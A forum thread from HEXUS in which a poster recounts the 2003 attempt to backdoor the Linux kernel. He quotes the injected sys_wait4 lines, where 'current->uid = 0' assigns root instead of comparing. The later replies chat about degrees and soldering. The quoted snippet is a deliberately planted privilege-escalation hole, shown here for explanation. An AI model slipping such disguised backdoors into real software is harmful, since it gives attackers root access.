Results 1 to 7 of 7

Thread: Hacks to be honest

  1. #1
    HEXUS webmaster Steve's Avatar
    Join Date
    Nov 2003
    Posts
    14,283
    Thanks
    293
    Thanked
    841 times in 476 posts

    Hacks to be honest

    I love a good hacker story; real ones that is.

    I recently came across a story of an attempt to inject code into the Linux kernel that would give any local user root access on demand. I probably came across the news at the time of the discovery, but was then too uneducated to understand it.

    Still, now I find it's a very interesting story and highlights just how easy it is to mislead people.

    Back in Nov 2003 somebody noticed somebody had directly modified a CVS tree used in Linux development. At first it seemed like a silly user, or somebody who wasn't doing things properly.

    However, follow the aforelinked mailing list replies and you'll see what was changed by the direct modification:
    Code:
    + if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    + retval = -EINVAL;
    The code appeared in the file exit.c within the sys_wait4 function, part of the scheduling/queuing system in Linux.

    The second line of code is pointless, but the one before it is potentially very problematic. The first half of the if statement checks for two flags. With the gcc compiler, this half of the if will be evaluated first (I do believe it's not a strict rule in C, however, and some compilers may do it differently?). If it's true, then the second half (after the &&) will be evaluated too.

    First up, the two flags would never logically be set simultaneously (so I've read in the mailing list and other articles on this matter), but somebody could make them so, thus making the second half of the if statement evaluate.

    The only problem is the second half of the statement isn't an evaluation, it's an assignment. "current->uid = 0" doesn't check the user id, it sets it. Bang, bit of root access for you, right there. == and =, there's a big difference.

    Luckily the direct modification was noticed, and the intent of the injected code very quickly discovered, but had the edit been noticed, how long would it have been before it was found?

    Hopefully some of you find stuff like this interesting too. Half of my degree is Computer Science, so I find it interesting by default I guess. Still, thought it was worth sharing
    PHP Code:
    $s = new signature();
    $s->sarcasm()->intellect()->font('Courier New')->display(); 

  2. #2
    Network|Geek kidzer's Avatar
    Join Date
    Jul 2005
    Location
    Aberdeenshire
    Posts
    1,732
    Thanks
    91
    Thanked
    47 times in 42 posts
    • kidzer's system
      • Motherboard:
      • $motherboard
      • CPU:
      • Intel Q6600
      • Memory:
      • 4GB
      • Storage:
      • 1TiB Samsung
      • Graphics card(s):
      • BFG 8800GTS OC
      • PSU:
      • Antec Truepower
      • Case:
      • Antec P160
      • Operating System:
      • Windows 7
      • Monitor(s):
      • 20" Viewsonic
      • Internet:
      • ~3Mbps ADSL (TalkTalk Business)
    I don't really understand a word of it, but its an interesting read

    You say half your degree is Comp Sci, whats the other half?
    "If you're not on the edge, you're taking up too much room!"
    - me, 2005

  3. #3
    HEXUS webmaster Steve's Avatar
    Join Date
    Nov 2003
    Posts
    14,283
    Thanks
    293
    Thanked
    841 times in 476 posts
    Electronics Engineering.

    I do Computer Systems Engineering, which is basically a mix of the two.
    PHP Code:
    $s = new signature();
    $s->sarcasm()->intellect()->font('Courier New')->display(); 

  4. #4
    Grumpy and VERY old :( g8ina's Avatar
    Join Date
    Nov 2006
    Location
    Northampton
    Posts
    6,776
    Thanks
    2,613
    Thanked
    1,704 times in 1,108 posts
    • g8ina's system
      • Motherboard:
      • ASRock Z75 Pro3
      • CPU:
      • Intel(R) Core(TM) i5-3570K CPU @ 3.40GHz 3.40 GHz
      • Memory:
      • 16GB Corsair 1600MHz DDR3.
      • Storage:
      • 250GB SSD system, 250GB SSD Data + 2TB data, + 8TB NAS
      • Graphics card(s):
      • XFX Radeon HD 6870
      • Case:
      • Coolermaster Elite 430
      • Operating System:
      • Win10
      • Monitor(s):
      • Iiyama 22"
      • Internet:
      • Virgin 100MB unlimited
    But do you know which end of a soldering iron gets hot ?

    I had a degree engineer working for me in Saudi in 1980, and the daft budder burned himself cuz he didnt know !!!

    Honestly !!!
    Cheers, David



  5. #5
    HEXUS webmaster Steve's Avatar
    Join Date
    Nov 2003
    Posts
    14,283
    Thanks
    293
    Thanked
    841 times in 476 posts
    I can just about remember, although I haven't warmed one up for over a year now... gotta love breadboard!

    That said, my solder skills are OK... not great, but a lot better than some I've seen.
    PHP Code:
    $s = new signature();
    $s->sarcasm()->intellect()->font('Courier New')->display(); 

  6. #6
    Network|Geek kidzer's Avatar
    Join Date
    Jul 2005
    Location
    Aberdeenshire
    Posts
    1,732
    Thanks
    91
    Thanked
    47 times in 42 posts
    • kidzer's system
      • Motherboard:
      • $motherboard
      • CPU:
      • Intel Q6600
      • Memory:
      • 4GB
      • Storage:
      • 1TiB Samsung
      • Graphics card(s):
      • BFG 8800GTS OC
      • PSU:
      • Antec Truepower
      • Case:
      • Antec P160
      • Operating System:
      • Windows 7
      • Monitor(s):
      • 20" Viewsonic
      • Internet:
      • ~3Mbps ADSL (TalkTalk Business)
    Oooh, solder...not one of my strong points, I dont like Lead-free solder, although I did get better over my first semester.

    Made a PSU and I fixed my floppy drive, thats all the soldering i've done except for a wee radio about 4 years ago!

    Computer Systems Engineering, sounds rather cool
    "If you're not on the edge, you're taking up too much room!"
    - me, 2005

  7. #7
    Grumpy and VERY old :( g8ina's Avatar
    Join Date
    Nov 2006
    Location
    Northampton
    Posts
    6,776
    Thanks
    2,613
    Thanked
    1,704 times in 1,108 posts
    • g8ina's system
      • Motherboard:
      • ASRock Z75 Pro3
      • CPU:
      • Intel(R) Core(TM) i5-3570K CPU @ 3.40GHz 3.40 GHz
      • Memory:
      • 16GB Corsair 1600MHz DDR3.
      • Storage:
      • 250GB SSD system, 250GB SSD Data + 2TB data, + 8TB NAS
      • Graphics card(s):
      • XFX Radeon HD 6870
      • Case:
      • Coolermaster Elite 430
      • Operating System:
      • Win10
      • Monitor(s):
      • Iiyama 22"
      • Internet:
      • Virgin 100MB unlimited
    I soldered my first joint (in a crystal set) at age 8, in 1963/4

    I have electrons in my veins and arteries, not blood !
    Cheers, David



Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Selling hacks on ebay
    By AlCapacino in forum Gaming
    Replies: 22
    Last Post: 16-11-2006, 06:51 PM
  2. O'Reilly's Flickr Hacks book
    By Bob Crabtree in forum HEXUS News
    Replies: 4
    Last Post: 21-04-2006, 03:52 PM
  3. O'Reilly's Flickr Hacks book
    By Bob Crabtree in forum Consumer Electronics
    Replies: 0
    Last Post: 21-04-2006, 02:53 PM
  4. Freeipoduk.com = a honest review
    By tim_n in forum Reader Reviews
    Replies: 28
    Last Post: 20-02-2006, 09:27 AM
  5. Top 10 PSP Hacks
    By Steve in forum HEXUS News
    Replies: 0
    Last Post: 27-07-2005, 05:04 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •